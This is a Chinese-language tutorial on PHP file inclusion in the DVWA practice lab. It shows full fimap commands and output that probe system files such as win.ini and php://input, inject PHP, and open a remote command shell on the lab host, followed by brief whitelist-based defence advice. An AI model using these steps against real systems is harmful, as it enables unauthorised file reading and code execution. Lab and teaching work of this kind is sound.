原理和渗透方式瞄瞄这个:新手指南:DVWA-1.9全级别教程之File Inclusion
这里介绍个文件包含渗透工具:fimap
fimap测试
-u:指定url
--cookie:设置cookie信息
➜ ~ fimap -u "http://192.168.56.101/DVWA/vulnerabilities/fi/?page=file3.php" --cookie="security=medium; PHPSESSID=b2i1bqt4mvna2faanq5jq5rm62"
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
SingleScan is testing URL: 'http://192.168.56.101/DVWA/vulnerabilities/fi/?page=file3.php'
[02:11:10] [OUT] Inspecting URL 'http://192.168.56.101/DVWA/vulnerabilities/fi/?page=file3.php'...
[02:11:10] [INFO] Fiddling around with URL...
[02:11:10] [OUT] [PHP] Possible file inclusion found! -> 'http://192.168.56.101/DVWA/vulnerabilities/fi/?page=rySlWVBw' with Parameter 'page'.
[02:11:10] [OUT] [PHP] Identifying Vulnerability 'http://192.168.56.101/DVWA/vulnerabilities/fi/?page=file3.php' with Parameter 'page'...
[02:11:10] [INFO] Scriptpath received: 'D:\xampp\htdocs\DVWA\vulnerabilities\fi'
[02:11:10] [INFO] Operating System is 'Windows'.
[02:11:10] [INFO] Testing file 'c:\boot.ini'...
[02:11:10] [INFO] Testing file 'c:\windows\win.ini'...
[02:11:10] [INFO] Testing file 'php://input'...
[02:11:10] [INFO] Testing file 'C:\Program Files\Apache Group\Apache\logs\access.log'...
[02:11:10] [WARN] HTTP Error 400: Bad Request
[02:11:10] [INFO] Testing file 'C:\Program Files\Apache Group\Apache\logs\access_log'...
[02:11:10] [WARN] HTTP Error 400: Bad Request
[02:11:10] [INFO] Testing file 'http://www.tha-imax.de/fimap_testfiles/test'...
##################################################################################
#[1] Possible PHP-File Inclusion #
##################################################################################
#::REQUEST #
# [URL] http://192.168.56.101/DVWA/vulnerabilities/fi/?page=file3.php #
# [HEAD SENT] Cookie #
#::VULN INFO #
# [GET PARAM] page #
# [PATH] D:\xampp\htdocs\DVWA\vulnerabilities\fi #
# [OS] Windows #
# [TYPE] Absolute Clean #
# [TRUNCATION] No Need. It's clean. #
# [READABLE FILES] #
# [0] c:\windows\win.ini #
# [1] php://input #
##################################################################################
-X:进行漏洞验证,获得一个shell
➜ ~ fimap -X
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
###########################
#:: List of Domains :: #
###########################
#[1] 192.168.56.101 #
#[q] Quit #
###########################
Choose Domain: 1
###############################################################################################################
#:: FI Bugs on '192.168.56.101' :: #
###############################################################################################################
#[1] URL: '/DVWA/vulnerabilities/fi/?page=file3.php' injecting file: 'php://input' using GET-param: 'page' #
#[q] Quit #
###############################################################################################################
Choose vulnerable script: 1
[02:16:01] [INFO] Testing PHP-code injection thru POST...
[02:16:01] [OUT] PHP Injection works! Testing if execution works...
[02:16:01] [INFO] Testing execution thru 'popen[b64][win]'...
[02:16:02] [OUT] Execution thru 'popen[b64][win]' works!
####################################################
#:: Available Attacks - PHP and SHELL access :: #
####################################################
#[1] Spawn fimap shell #
#[2] [Test Plugin] Show some info #
#[q] Quit #
####################################################
Choose Attack: 1
Please wait - Setting up shell (one request)...
-------------------------------------------
Welcome to fimap shell!
Better don't start interactive commands! ;)
Also remember that this is not a persistent shell.
Every command opens a new shell and quits it after that!
Enter 'q' to exit the shell.
-------------------------------------------
fishell@MAJX2:D:\xampp\htdocs\DVWA\vulnerabilities\fi$> whoami
cn\majx2
更详细参数通过 -h 查看。
如何防御
1、基于白名单进行防御,确保page参数传递的只能是固定的文件名。
2、如果文件包含与文件上传结合,可以直接上传图片文件,执行代码。需要全面防御
网友评论